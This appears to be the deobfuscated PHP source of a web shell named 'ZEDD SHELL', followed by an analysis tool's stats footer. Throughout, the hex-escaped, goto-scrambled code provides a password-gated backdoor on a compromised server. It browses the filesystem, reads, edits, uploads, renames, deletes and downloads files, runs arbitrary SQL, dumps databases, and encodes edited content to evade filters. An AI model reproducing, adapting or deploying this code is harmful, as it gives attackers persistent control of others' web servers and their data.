<?php if (!empty($host)) { try { $pdo = new PDO("\x6d\x79\163\x71\x6c\72\x68\157\163\164\x3d" . $host . "\x3b\x63\150\x61\x72\x73\145\x74\x3d\x75\164\146\x38\x3b" . $databaseStr, $user, $sandi, array(PDO::MYSQL_ATTR_INIT_COMMAND => "\123\105\124\x20\x4e\101\115\x45\123\40\47\x75\164\146\70\47")); $pdo->setAttribute(PDO::ATTR_DEFAULT_FETCH_MODE, PDO::FETCH_ASSOC); $schematas = $pdo->query("\x53\105\114\105\103\124\40\x73\x63\x68\x65\155\x61\137\156\x61\x6d\145\x20\106\122\x4f\115\x20\151\x6e\x66\x6f\162\x6d\x61\164\151\x6f\x6e\137\x73\143\x68\x65\x6d\141\x2e\x73\x63\150\145\155\x61\164\x61"); print "\x3c\x66\x6f\x72\155\40\155\145\164\150\157\144\x3d\x22\x50\117\x53\x54\42\x3e\x3c\x69\x6e\160\165\164\x20\x74\x79\x70\x65\75\x22\150\x69\144\144\145\x6e\x22\40\156\141\155\145\x3d\42\x61\167\x61\154\x22\x20\166\141\154\165\x65\x3d\42\163\153\x6c\x22\x3e\x3c\x73\145\154\x65\143\164\40\x6e\x61\x6d\x65\x3d\x22\144\x61\164\141\x62\x61\163\145\42\x3e"; foreach ($schematas->fetchAll() as $schemaName) { print "\74\157\160\164\151\x6f\156" . ($database == $schemaName["\x73\x63\150\145\x6d\141\137\x6e\141\x6d\x65"] ? "\40\x73\x65\154\x65\x63\x74\145\144" : '') . "\x3e" . htmlspecialchars($schemaName["\163\x63\150\145\x6d\141\137\x6e\141\x6d\145"]) . "\x3c\57\157\160\164\x69\x6f\156\76"; } print "\x3c\x2f\163\x65\x6c\145\x63\164\76\40\74\151\156\160\165\164\40\x74\x79\160\145\x3d\42\163\165\142\155\x69\x74\x22\40\166\141\154\165\145\75\42\x47\x61\163\41\x22\76\74\x2f\146\x6f\162\x6d\76"; if (!empty($database)) { $tables = $pdo->prepare("\x53\x45\114\x45\103\124\x20\164\x61\142\x6c\x65\137\x6e\x61\155\x65\x20\x66\x72\157\x6d\40\x69\x6e\x66\x6f\162\x6d\x61\164\x69\157\156\137\163\x63\x68\x65\x6d\141\x2e\x74\x61\x62\154\145\163\x20\167\150\x65\x72\x65\x20\164\x61\142\154\145\137\163\143\x68\x65\155\x61\x3d\x3f"); $tables->execute(array($database)); $tables = $tables->fetchAll(); print "\74\x64\151\166\40\x73\x74\x79\x6c\x65\x3d\42\146\154\x6f\141\164\72\40\154\x65\x66\x74\x3b\x20\x77\x69\x64\164\150\x3a\40\x32\60\x25\x3b\x20\157\x76\145\x72\x66\154\x6f\167\72\x20\x61\x75\164\157\x3b\40\x62\157\162\x64\x65\x72\55\162\151\147\150\x74\x3a\x20\x31\160\x78\x20\x73\x6f\x6c\x69\x64\x20\x23\x39\x39\71\73\42\x3e"; print "\74\x61\x20\x68\x72\145\146\75\42\x6a\141\x76\141\x73\x63\x72\151\160\164\72\150\x61\154\141\155\141\x6e\50\x27\77\141\x77\141\x6c\x3d\x73\153\x6c\137\x64\47\x29\73\42\76\x21\x21\40\104\165\155\160\x20\x44\102\x20\41\41\x3c\x2f\x61\x3e\x3c\x68\x72\76"; foreach ($tables as $tableName) { $tableName = $tableName["\x74\x61\x62\x6c\145\137\156\x61\155\x65"]; print "\74\x61\40\150\162\x65\x66\75\x22\152\141\166\x61\x73\x63\x72\151\x70\x74\72\x68\141\154\141\x6d\x61\156\50\47\x3f\x61\x77\141\154\75\163\x6b\154\x26\x74\75" . urlencode(urlencode(kunci($tableName))) . "\47\x29\x22\x3e" . htmlspecialchars($tableName) . "\74\57\x61\76\x3c\142\x72\x3e"; } print "\74\57\x64\x69\166\x3e"; print "\74\144\x69\x76\x20\x73\164\171\x6c\145\75\x22\x66\154\157\141\x74\72\x20\x6c\145\146\164\x3b\x20\x70\x61\x64\x64\151\x6e\x67\55\x6c\x65\x66\164\72\40\x31\60\160\x78\73\x20\167\x69\144\x74\150\x3a\40\x37\x35\45\x3b\42\76"; if (isset($_POST["\164"]) && is_string($_POST["\164"]) && !empty($_POST["\x74"])) { $tableName = uraikan(urldecode($_POST["\x74"])); print "\x3c\163\x70\x61\156\40\143\x6c\x61\x73\163\75\42\161\141\x6c\x69\x6e\42\76\x54\141\142\154\x65\72\74\x2f\x73\160\141\156\x3e\x20" . htmlspecialchars($tableName) . "\40\50\x20\74\141\x20\x68\x72\145\146\x3d\x22\x6a\141\x76\141\x73\x63\162\x69\160\x74\x3a\150\x61\154\x61\155\x61\x6e\x28\x27\77\141\167\141\x6c\x3d\163\153\x6c\x5f\144\137\x74\x26\x74\75" . urlencode(urlencode(kunci($tableName))) . "\x27\51\42\76\x44\165\x6d\160\x3c\57\141\x3e\x20\51\x3c\x62\162\76"; $getColumns = $pdo->prepare("\x53\x45\x4c\105\x43\124\40\143\157\x6c\x75\155\156\x5f\156\x61\155\145\x20\x66\162\x6f\x6d\x20\151\x6e\146\x6f\x72\155\x61\164\x69\157\156\x5f\x73\x63\150\x65\155\141\56\143\157\154\x75\x6d\x6e\163\x20\167\150\x65\162\x65\40\164\141\142\x6c\x65\x5f\x73\x63\x68\145\x6d\x61\x3d\77\x20\x61\x6e\144\40\x74\x61\142\x6c\x65\x5f\156\141\155\x65\x3d\77"); $getColumns->execute(array($database, $tableName)); $columns = $getColumns->fetchAll(); if ($columns) { $dataCount = $pdo->query("\x53\105\114\105\103\x54\x20\143\157\165\156\x74\x28\60\x29\40\x41\123\x20\163\163\x20\146\162\157\155\x20\x60" . $tableName . "\x60"); $dataCount = (int) $dataCount->fetchColumn(); print "\x3c\163\160\x61\156\40\x63\154\141\x73\163\x3d\42\x71\x61\154\x69\156\42\x3e\x43\157\x75\156\x74\72\x3c\57\163\x70\141\156\x3e\x20" . $dataCount . "\x3c\x62\x72\76\x3c\142\x72\76"; $pages = ceil($dataCount / 100); $currentPage = isset($_POST["\x68\141\154\141\155\141\x6e"]) && is_numeric($_POST["\x68\x61\154\141\155\141\x6e"]) && $_POST["\x68\x61\154\x61\155\141\x6e"] >= 1 && $_POST["\150\x61\154\141\155\x61\156"] <= $pages ? (int) $_POST["\x68\x61\154\141\155\141\x6e"] : 1; for ($p = 1; $p <= $pages; $p++) { print "\x3c\x61\x20\163\164\171\154\145\x3d\x22" . ($currentPage == $p ? "\142\x61\143\x6b\147\162\x6f\x75\156\x64\72\x20\43\x34\x34\64\x3b" : '') . "\x6d\141\162\147\x69\x6e\55\x6c\145\146\x74\72\x20\x32\x70\x78\73\x20\155\x61\162\147\x69\156\55\142\x6f\164\164\x6f\x6d\72\40\65\160\170\73\x20\160\x61\144\144\151\156\147\x3a\40\62\160\x78\x20\x36\x70\x78\x3b\x20\142\x6f\162\x64\145\162\x3a\x20\x31\x70\x78\x20\163\x6f\x6c\151\x64\x20\43\101\103\x42\x37\65\64\73\x20\x74\145\x78\x74\x2d\x64\x65\x63\x6f\162\141\x74\151\x6f\x6e\x3a\x20\x6e\157\156\x65\x3b\x22\x20\x68\162\x65\x66\x3d\42\152\x61\x76\x61\x73\143\x72\151\x70\x74\x3a\x68\141\154\141\155\141\156\50\x27\77\x61\167\x61\154\75\163\153\154\x26\x74\x3d" . urlencode(urlencode(kunci($tableName))) . "\46\150\141\154\x61\x6d\x61\x6e\x3d" . $p . "\47\51\x3b\42\76" . $p . "\74\57\x61\76\40"; } print "\74\x62\x72\76\74\x62\162\76"; $start = 100 * ($currentPage - 1); $data = $pdo->query("\x53\105\114\x45\x43\124\x20\52\x20\x46\122\117\x4d\x20\140" . $tableName . "\140\40\114\111\115\x49\x54\x20" . $start . "\40\54\x20\x31\x30\60"); $data = $data->fetchAll(); print "\74\164\141\142\154\x65\76\74\x74\150\x65\x61\x64\76"; foreach ($columns as $columnInf) { print "\x3c\164\x68\76" . htmlspecialchars($columnInf["\x63\157\154\x75\x6d\x6e\x5f\156\141\155\x65"]) . "\x3c\57\x74\150\76"; } print "\x3c\57\x74\x68\145\x61\x64\76\74\164\142\157\x64\171\76"; foreach ($data as $row) { print "\x3c\164\162\76"; foreach ($row as $key => $val) { print "\74\x74\x64\76\x3c\144\151\x76\x3e" . $val . "\x3c\x2f\144\151\x76\76\x3c\x2f\x74\144\x3e"; } print "\74\57\x74\162\76"; } print "\x3c\57\164\162\76\74\57\164\142\x6f\144\171\76\x3c\57\x74\x61\142\x6c\x65\x3e"; } else { print "\124\141\x62\154\145\x20\156\157\164\x20\x66\157\x75\x6e\144\41"; } } else { if (isset($_POST["\145\x6d\x72"]) && is_string($_POST["\145\x6d\162"]) && !empty($_POST["\145\x6d\162"])) { $emr = uraikan(urldecode($_POST["\145\155\x72"])); print "\x3c\x73\x70\141\156\40\x63\x6c\x61\163\x73\75\x22\161\x61\154\151\x6e\42\76\123\x51\114\x20\x65\155\162\72\x3c\x2f\x73\x70\141\156\x3e\x20" . htmlspecialchars($emr) . "\x3c\x62\x72\76"; $data = $pdo->query($emr); $data = $data->fetchAll(); print "\74\164\141\x62\154\145\x3e\x3c\164\150\145\141\x64\x3e"; if (count($data) > 0) { print "\x3c\x74\x72\x3e"; foreach ($data[0] as $key => $val) { print "\74\x74\x68\76\74\x64\151\166\x3e" . $key . "\x3c\x2f\x64\x69\x76\76\74\x2f\164\150\x3e"; } print "\74\x2f\164\x72\x3e"; } print "\74\x2f\164\x68\145\141\x64\76\74\164\x62\157\x64\171\x3e"; foreach ($data as $row) { print "\74\164\x72\x3e"; foreach ($row as $key => $val) { print "\74\164\144\x3e\74\x64\x69\166\x3e" . $val . "\x3c\x2f\144\151\x76\76\x3c\x2f\164\x64\x3e"; } print "\x3c\x2f\x74\162\x3e"; } print "\x3c\57\x74\162\76\74\57\x74\x62\157\144\x79\76\74\57\164\x61\x62\x6c\x65\x3e"; } } print "\74\144\151\166\76\x3c\x74\145\170\x74\141\x72\145\x61\x20\151\x64\75\x22\163\153\154\x5f\x65\155\x72\42\76\x3c\57\164\145\x78\164\x61\162\x65\141\76\74\142\x75\164\164\x6f\156\40\x74\171\160\145\75\42\x62\x75\164\164\x6f\x6e\42\40\157\x6e\143\x6c\x69\x63\x6b\x3d\x22\x73\153\154\x5f\142\x61\x73\50\x29\73\42\76\x4b\x6c\151\153\74\x2f\142\x75\x74\x74\x6f\156\76\74\57\x64\x69\166\76"; print "\x3c\x2f\144\151\166\x3e"; print "\x3c\x64\x69\166\x20\163\x74\171\154\x65\x3d\42\x63\x6c\x65\x61\x72\x3a\40\142\x6f\164\150\73\42\x3e\x3c\57\144\151\166\x3e"; } } catch (Exception $e) { print $e->getMessage(); } } } else { if ($awal == "\x65\x64\x69\x74\x5f\x66\151\154\145" && isset($_POST["\146\141\171\x6c"]) && '' != trim($_POST["\x66\141\171\154"])) { $namaBerkas = basename(uraikan(urldecode(urldecode($_POST["\146\x61\x79\154"])))); $pemisah = substr($default_dir, strlen($default_dir) - 1) != "\57" && substr($namaBerkas, 0, 1) != "\57" ? "\x2f" : ''; if (is_file($default_dir . $pemisah . $namaBerkas) && is_readable($default_dir . $pemisah . $namaBerkas)) { $status = ''; if (isset($_POST["\x63\x6f\x6e\x74\x65\156\164"]) && isset($_POST["\x74\157\157\153"]) && $_POST["\x74\157\157\153"] != '' && isset($_SESSION["\x79\163\x5f\x74\x6f\157\153"]) && $_SESSION["\171\x73\x5f\164\x6f\157\x6b"] == $_POST["\164\157\157\153"] && is_writeable($default_dir . $pemisah . $namaBerkas)) { unset($_SESSION["\x79\x73\x5f\x74\x6f\x6f\153"]); $content = $_POST["\x63\x6f\x6e\164\145\156\164"]; $cc = array("\141", "\151", "\145", "\x73", "\x6c", "\142", "\x75", "\x6f", "\x70", "\x68", "\x28", "\x29", "\74", "\x3e", "\77", "\x3b", "\133", "\135", "\44"); foreach ($cc as $k1 => $v1) { $content = str_replace("\174\x3a" . $k1 . "\72\174", $v1, $content); } $faylAch = fopen($default_dir . $pemisah . $namaBerkas, "\167\53"); fwrite($faylAch, $content); fclose($faylAch); $status = "\x20\x3c\x73\x70\x61\x6e\x20\143\154\x61\163\163\75\47\x71\141\x6c\x69\x6e\47\x3e\x42\x65\162\x68\141\163\x69\154\40\x64\x69\x73\x69\155\160\141\156\41\x3c\57\163\x70\141\156\x3e"; } $oxuUrl = "\x3f\141\167\141\154\x3d\142\141\x63\141\137\146\x69\154\145\46\x66\x61\x79\154\x3d" . urlencode(urlencode(kunci($namaBerkas))) . "\x26\x62\x65\x72\153\141\x73\75" . urlencode(urlencode(kunci($default_dir))); $elaveBtn = is_writeable($default_dir . $pemisah . $namaBerkas) ? '' : "\40\144\x69\163\x61\x62\x6c\145\x64"; print "\74\144\x69\x76\x3e\x4e\141\155\x61\x20\106\x69\154\x65\x3a\40\x3c\x61\x20\143\154\141\x73\163\75\47\x71\x61\154\151\x6e\x27\x20\150\162\145\146\75\x27\x6a\x61\166\x61\x73\x63\x72\151\160\164\x3a\x68\141\x6c\x61\x6d\x61\156\x28\42{$oxuUrl}\x22\x29\47\76" . htmlspecialchars($namaBerkas) . "\74\57\141\x3e\74\142\162\57\x3e\74\x66\x6f\162\155\40\155\x65\164\x68\157\x64\x3d\47\x50\x4f\x53\x54\x27\40\x73\x74\x79\154\x65\75\x27\160\141\144\x64\x69\156\x67\72\x20\60\x3b\x20\155\x61\162\x67\151\156\x3a\x20\60\x3b\x27\76\74\142\165\164\x74\157\x6e\x20\164\171\x70\145\x3d\x27\163\x75\x62\155\151\x74\47\40\143\154\x61\163\163\x3d\47\142\164\156\47{$elaveBtn}\x3e\x20\123\x69\155\x70\141\156\40\x3c\57\x62\165\x74\x74\157\156\x3e\40\74\x62\165\164\164\157\x6e\x20\x74\x79\160\x65\75\x27\142\x75\164\164\x6f\x6e\x27\40\157\156\143\154\x69\x63\153\75\47\153\157\144\145\x28\x29\x27\76\40\x45\x6e\153\162\151\160\163\x69\x20\74\x2f\x62\165\x74\164\x6f\x6e\76\x20{$status}\74\x2f\144\x69\166\76"; print "\74\x69\156\x70\x75\164\40\x74\x79\160\x65\75\x27\x68\x69\x64\144\145\x6e\x27\40\166\141\x6c\x75\x65\x3d\47\145\x64\151\x74\x5f\x66\151\x6c\x65\x27\x20\156\x61\155\x65\75\47\141\167\141\154\x27\76\74\x69\156\160\165\164\x20\164\171\x70\x65\x3d\47\x68\x69\x64\x64\x65\x6e\x27\x20\x76\x61\154\x75\145\x3d\x27" . kunci($namaBerkas) . "\47\40\x6e\141\x6d\x65\x3d\47\146\x61\171\x6c\47\x3e\x3c\x69\156\160\x75\x74\40\x74\171\160\x65\75\47\150\x69\x64\144\145\156\47\x20\166\x61\x6c\x75\145\75\47" . urlencode(kunci($default_dir)) . "\47\x20\156\x61\x6d\145\x3d\47\x62\145\162\x6b\x61\163\x27\x3e\74\x69\156\160\165\x74\40\x74\x79\x70\x65\75\x27\x68\151\144\144\145\x6e\x27\x20\166\x61\x6c\165\145\x3d\47" . ambilBuat("\x79\163\x5f\164\x6f\x6f\x6b") . "\47\x20\156\x61\x6d\x65\75\47\164\x6f\157\153\47\76\x3c\x74\145\170\x74\x61\x72\x65\141\x20\156\141\155\x65\x3d\x27\x63\x6f\156\x74\x65\156\x74\47\x20\x63\154\x61\x73\163\x3d\x27\146\x69\x6c\x65\x5f\145\x64\151\x74\x27\76" . htmlspecialchars(file_get_contents($default_dir . $pemisah . $namaBerkas)) . "\74\x2f\164\x65\x78\x74\141\162\x65\x61\76\74\x2f\146\157\162\155\76"; } else { print "\x45\162\x72\157\x72\41\40" . htmlspecialchars($default_dir . $pemisah . $namaBerkas); } } else { if (is_dir($default_dir)) { if (is_readable($default_dir)) { $folderDalam = scandir($default_dir); foreach ($folderDalam as &$emelemnt) { $pemisah = substr($default_dir, strlen($default_dir) - 1) != "\x2f" && substr($emelemnt, 0, 1) != "\57" ? "\x2f" : ''; if (is_dir($default_dir . $pemisah . $emelemnt)) { $emelemnt = "\60" . $emelemnt; } else { $emelemnt = "\61" . $emelemnt; } } asort($folderDalam); print "\x3c\x74\141\x62\x6c\145\40\x63\x6c\141\163\163\75\47\x66\x4d\x61\156\141\x67\x65\x72\x27\40\163\x74\x79\154\x65\x3d\47\x77\151\144\164\x68\x3a\40\61\60\x30\45\73\47\x3e\74\x74\x68\x65\141\x64\76\x3c\164\x72\40\x63\x6c\141\x73\x73\75\x27\x71\141\x6c\151\156\x27\76\74\164\150\x3e\x73\74\x2f\x74\150\76\74\x74\x68\x3e\x46\151\154\x65\74\x2f\164\150\x3e\74\164\x68\x3e\x53\x69\172\145\74\x2f\x74\150\x3e\74\x74\150\x3e\x54\x61\156\147\147\141\x6c\x3c\57\164\150\x3e\74\x74\150\76\x4f\167\x6e\145\x72\x2f\x47\x72\x6f\165\x70\74\x2f\164\150\x3e\x3c\164\150\76\x50\145\x72\155\151\163\x73\151\x6f\156\163\x3c\x2f\164\x68\x3e\x3c\164\150\76\x41\x63\164\151\x6f\x6e\x73\x3c\x2f\x74\x68\x3e\x3c\x2f\164\162\76\x3c\x2f\x74\150\x65\x61\x64\76\74\164\x62\157\x64\x79\76"; foreach ($folderDalam as $element) { $url = ''; $element = substr($element, 1); $fileNamaLengkap = $default_dir . $pemisah . $element; $pemisah = substr($default_dir, strlen($default_dir) - 1) != "\x2f" && substr($element, 0, 1) != "\x2f" ? "\57" : ''; $adi = is_dir($fileNamaLengkap) ? "\x5b\x20{$element}\40\135" : $element; $classN = ''; if (is_dir($fileNamaLengkap)) { if ($element == "\x2e") { $url = "\77\x62\145\x72\x6b\x61\163\x3d" . urlencode(urlencode(kunci($default_dir))); } else { if ($element == "\x2e\56") { $yeniUrl = explode("\57", $default_dir); foreach (array_reverse($yeniUrl) as $j => $qq) { if (trim($qq) != '') { unset($yeniUrl[count($yeniUrl) - $j - 1]); break; } } $url = "\77\142\x65\162\x6b\141\x73\x3d" . urlencode(urlencode(kunci(implode("\57", $yeniUrl)))); } else { $url = "\77\x62\145\x72\x6b\141\x73\x3d" . urlencode(urlencode(kunci($fileNamaLengkap))); } } $classN = "\40\163\164\x79\154\x65\x3d\x27\146\x6f\x6e\x74\55\167\x65\x69\x67\x68\x74\x3a\40\x36\60\x30\73\47"; } else { $url = "\77\141\167\141\154\75\x62\141\143\141\137\x66\x69\154\145\x26\x66\141\x79\x6c\x3d" . urlencode(urlencode(kunci($element))) . "\46\x62\145\162\153\141\163\x3d" . urlencode(urlencode(kunci($default_dir))); } $fayldi = is_file($fileNamaLengkap); $isReadableColor = is_readable($fileNamaLengkap) && is_writeable($fileNamaLengkap); print "\74\164\x72\x3e\12\x9\x9\11\x9\11\x9\74\x74\144\x3e\74\57\x74\144\x3e\xa\11\x9\11\x9\11\11\74\164\x64\76\74\x61\40\x68\x72\x65\x66\x3d\42\x6a\x61\166\x61\x73\x63\162\151\160\x74\72\150\141\x6c\x61\x6d\141\156\50\47" . $url . "\47\x29\x22" . $classN . "\76" . htmlspecialchars($adi) . "\74\x2f\x61\76\x3c\57\164\x64\x3e\xa\11\11\x9\x9\x9\11\x3c\x74\144\x3e" . ($fayldi ? sizeFormat(filesize($fileNamaLengkap)) : '') . "\x3c\x2f\x74\x64\76\xa\x9\11\x9\x9\x9\11\x3c\x74\x64\x3e" . date("\144\x20\115\x20\x59\54\40\110\72\151", filectime($fileNamaLengkap)) . "\74\57\x74\144\x3e\xa\x9\x9\x9\11\x9\11\74\164\x64\x3e" . htmlspecialchars(fileowner($fileNamaLengkap)) . "\74\x2f\x74\x64\x3e\12\x9\11\x9\x9\11\11\74\x74\144" . ($isReadableColor ? "\x20\163\164\171\154\145\x3d\42\143\x6f\x6c\x6f\x72\72\x20\x67\162\145\x65\x6e\x3b\42" : '') . "\76" . substr(sprintf("\x25\x6f", fileperms($fileNamaLengkap)), -4) . "\x3c\x2f\x74\144\76\12\x9\x9\x9\11\11\11\74\164\x64\x3e"; if (is_file($fileNamaLengkap)) { print "\40\x3c\141\x20\150\162\x65\x66\75\42\x6a\x61\x76\x61\163\143\162\151\x70\x74\72\x68\x61\x6c\141\x6d\x61\x6e\x28\x27" . str_replace("\x62\141\x63\x61\x5f\x66\x69\154\x65", "\144\157\x77\156\154\157\x61\x64\x5f\146\151\x6c\x65", $url) . "\x27\x29\42" . $classN . "\x3e\x44\x6f\167\x6e\154\157\141\144\74\x2f\x61\x3e\40\x7c\x20" . ("\40\74\141\40\150\x72\145\146\x3d\x22\152\x61\x76\141\163\143\x72\x69\x70\x74\72\143\150\x61\x6e\147\145\106\x69\154\145\x4e\x61\x6d\x65\x28\47" . htmlspecialchars($adi) . "\x27\x20\54\x20\x27" . str_replace("\142\x61\143\x61\137\x66\x69\154\x65", "\x72\145\x6e\x61\155\145\137\146\151\154\x65", $url) . "\x27\x29\x3b\42" . $classN . "\76\x52\145\x6e\141\155\x65\x3c\x2f\141\76\40\174\40") . ("\x20\74\141\40\150\162\x65\x66\75\x22\152\x61\x76\141\x73\143\162\x69\x70\x74\x3a\x66\141\171\x6c\x53\x69\x66\151\162\x6c\141\50\x27" . str_replace("\x62\141\x63\x61\x5f\146\151\x6c\x65", "\x72\x65\163\x65\164\x5f\x66\151\x6c\145", $url) . "\x27\51\73\42" . $classN . "\x3e\113\x6f\163\157\156\147\74\x2f\x61\x3e\40\x7c\x20") . ("\40\x3c\x61\40\150\x72\x65\x66\75\x22\152\141\166\x61\163\143\162\x69\x70\x74\x3a\146\141\171\x6c\x53\151\154\50\x27" . str_replace("\x62\141\x63\141\137\146\151\x6c\145", "\150\141\160\165\x73\137\x66\x69\x6c\x65", $url) . "\47\51\x22" . $classN . "\76\104\145\154\x65\164\x65\74\x2f\141\76"); } else { if ($adi != "\133\x20\56\x20\135" && $adi != "\133\x20\56\x2e\x20\135") { print "\40\x3c\141\40\x68\x72\x65\146\75\42\x6a\141\166\x61\163\x63\x72\x69\160\164\x3a\x6b\x6f\155\160\162\x65\x73\x28\47" . urlencode(urlencode(kunci($fileNamaLengkap))) . "\x27\51\x22" . $classN . "\x3e\x5a\151\x70\74\57\x61\76\x20\174\40" . ("\40\x3c\141\40\150\162\145\146\75\x22\152\141\x76\141\163\x63\162\x69\160\164\x3a\163\151\154\120\x61\x70\x6b\141\x28\47" . urlencode(urlencode(kunci($fileNamaLengkap))) . "\x27\x29\42" . $classN . "\x3e\110\141\x70\165\163\x3c\57\x61\76"); } } print "\74\57\x74\x64\x3e\12\x9\11\x9\11\x9\74\x2f\x74\x72\76"; } } else { print "\x3c\144\151\x76\x20\163\x74\171\154\x65\x3d\x27\x6d\141\x72\x67\x69\x6e\x3a\x20\x31\x30\160\x78\40\x30\x70\x78\x3b\x27\x20\143\x6c\x61\163\163\x3d\47\161\141\x6c\151\156\47\76\120\x65\162\155\x69\163\x73\x69\157\x6e\x73\40\x64\x65\156\151\x64\145\x64\41\x3c\57\x64\151\166\76"; } } } } } } } goto nllyF; aY4FZ: ?>
')">Command</a><br>
<a href="javascript:halaman('?awal=skl');">SQL</a><br>
<form method="POST" enctype="multipart/form-data">
<input type="hidden" name="awal" value="upl_file">
<input type="hidden" name="berkas" value="<?php goto iuLva; xKW7_: function tulisLah() { global $default_dir; $sonDir = array(); $umumBagikan = ''; $parse = explode("\57", $default_dir); $ii = 0; foreach ($parse as $bagikan) { $ii++; $umumBagikan .= $bagikan . "\x2f"; $sonDir[] = "\74\141\40\150\162\x65\146\75\x27\152\x61\x76\141\x73\143\162\151\x70\x74\x3a\150\x61\154\141\x6d\141\156\50\42\77\x62\x65\162\x6b\141\163\75" . urlencode(urlencode(kunci($umumBagikan))) . "\42\x29\x27\76" . htmlspecialchars(empty($bagikan) && $ii != count($parse) ? "\x2f" : $bagikan) . "\74\x2f\x61\x3e"; } $sonDir = implode("\57", $sonDir); print $sonDir . "\x26\x6e\142\163\x70\x3b\46\x6e\x62\163\160\73\x26\x6e\x62\x73\160\x3b\46\156\x62\163\160\73\x26\156\x62\x73\160\x3b\46\x6e\142\163\160\73\x28\40\74\141\x20\150\162\145\x66\75\42\x22\76\x52\x65\163\x65\164\74\x2f\x61\76\40\x7c\40\74\141\x20\x68\x72\145\146\75\x22\152\x61\x76\141\163\143\162\x69\x70\x74\72\x67\x6f\164\x6f\x28\x29\x22\76\107\157\40\164\157\74\57\x61\76\40\x29"; } goto dGims; UFLkn: $default_dir = str_replace("\x5c", "\x2f", $default_dir); goto solvS; pdDhL: ?>
<html>
<head>
<title>ZEDD SHELL</title>
<meta http-equiv="content-type" content="text/html; charset=utf-8">
<style>
body
{
background-color: #222222;
color: #D6D4D4;
font-family: Lucida,Verdana;
font-size: 12px;
}
.qalin
{
text-decoration: none;
color: #D6905E;
font-weight: 600;
}
.success
{
color: #9DB754;
}
.bad
{
color: #B75654;
}
a
{
color: #ACB754;
text-decoration: none !important;
}
.fManager,.fManager tbody,.fManager tr
{
padding: 0;
border-collapse: collapse;
margin: 0;
font-size: 12px;
}
.fManager
{
margin: 10px 0;
}
.fManager tbody tr:nth-child(2n+1)
{
background: #331717;
}
.fManager tbody tr:nth-child(2n)
{
background: #1C0C0C;
}
.fManager tbody tr:hover
{
background: #000000;
}
.fManager thead th
{
text-align: left;
}
.fManager thead tr
{
background-color: #333333;
}
.fManager
{
box-shadow: 1px 1px 1px 1px #333333;
}
.fManager thead th
{
padding: 4px 3px;
}
.baca_file
{
margin: 5px 0;
padding: 2px;
box-shadow: 1px 1px 1px 1px #333333;
background-color: #E1E1E1;
width: 100%;
height: 400px;
overflow: auto;
}
.btn
{
border: 1px solid #ACAE40;
background-color: #223B3B;
color: #E1E1E1;
padding: 1px 10px;
cursor: pointer;
}
.btn:disabled
{
border: 1px solid #848484;
color: #848484;
cursor: not-allowed;
}
.file_edit
{
margin: 5px 0;
padding: 2px;
box-shadow: 1px 1px 1px 1px #333333;
background-color: #E1E1E1;
width: 100%;
height: 400px;
overflow: auto;
}
input, select, textarea
{
background: transparent !important;
color: #f6a56d;
border: 1px solid #D6905E;
padding: 5px;
}
table td
{
border: 1px solid rgba(214, 144, 94, 0.7);
min-width: 20px;
padding-left: 5px;
padding-right: 5px;
max-width: 500px;
color: #ffad6f;
background: #292929;
}
table th
{
border: 1px solid #D6905E;
padding-left: 5px;
padding-right: 5px;
color: #ffad6f;
}
table td div
{
overflow: auto;
width: 100%;
height: 100%;
max-height: 100px;
}
</style>
</head>
<body>
<?php goto dF3DB; GiKED: print "\x3c\150\x72\76"; goto TO_CV; h2V9_: $hashedPassword = "\x24\x32\x61\44\61\62\44\124\120\142\130\x4e\x6f\117\x54\x6b\154\153\150\x74\61\x67\x62\x35\x4f\x4d\x30\x31\56\67\x53\x75\x37\157\x47\104\120\x55\x71\131\x75\145\63\x37\x55\112\155\x7a\x38\x2f\x2e\155\x35\144\156\161\x49\107\154\66"; goto pBQw3; pBQw3: error_reporting(0); goto f6D1Y; nllyF: print "\74\57\x74\142\157\144\x79\x3e\x3c\57\x74\x61\142\154\145\76"; goto NTuYv; zFQLu: if (!$_SESSION["\154\157\147\x67\x65\x64\x49\x6e"]) { ?>
<html>
<head>
<title>Login Administrator</title>
<link rel="stylesheet" type="text/css" href="https://cdn.statically.io/gh/Zeddgansz/shell/main/styles.css">
</head>
<body>
<div class="login-container">
<h1 id="flashingText">shell zedd</h1>
<form method="post">
<input type="password" name="password">
<br>
<input type="submit" name="submit" value="Login"><br>
</form>
<p id="emailLink"> <a href="mailto:[email protected]">[email protected]</a></p>
</div>
</body>
</html>
<?php die; } else { echo "\74\160\x3e\x4c\x6f\x67\151\156\x20\163\165\143\143\145\x73\x73\146\165\x6c\x21\74\x2f\x70\x3e"; } goto OUK0a; FocuE: print "\74\x73\x70\141\156\40\x63\x6c\x61\163\x73\x3d\47\x71\x61\154\x69\156\x27\76\104\151\x73\x61\142\x6c\145\x20\146\x75\x6e\143\x74\x69\157\x6e\163\x3a\x3c\x2f\x73\x70\141\x6e\76\40" . (implode("\54\40", $nami) == '' ? "\x3c\163\160\141\156\x20\143\x6c\141\x73\163\x3d\x27\x73\165\143\x63\x65\x73\163\47\x3e\x4e\117\x4e\x45\x20\x3a\51" : "\74\x73\x70\x61\x6e\x20\143\154\141\163\163\x3d\47\142\141\x64\47\76" . implode("\x2c\x20", $nami)) . "\74\x2f\x73\x70\x61\x6e\76\74\142\x72\57\76"; goto RyvPc; Oe4lN: ?>
&zf=" + berkas)
}
}
function kode()
{
var vall = document.getElementsByClassName('file_edit')[0].value;
var repp = ['a','i','e','s','l','b','u','o','p','h',"\\(","\\)","\\<","\\>","\\?","\\;","\\[","\\]","\\$"];
for(var s in repp)
{
var h = repp[s];
vall = vall.replace(new RegExp(h, 'g') , '|:'+s+':|');
}
document.getElementsByClassName('file_edit')[0].value = vall;
}
document.getElementById("emr_et_atash").addEventListener("keyup", function(event)
{
event.preventDefault();
if (event.keyCode === 13)
{
sistemKom();
}
});
</script>
</body>
</htmFunction Calls
| None |
Stats
| MD5 | 7fd25a221871f680e97a455b0e097862 |
| Eval Count | 0 |
| Decode Time | 62 ms |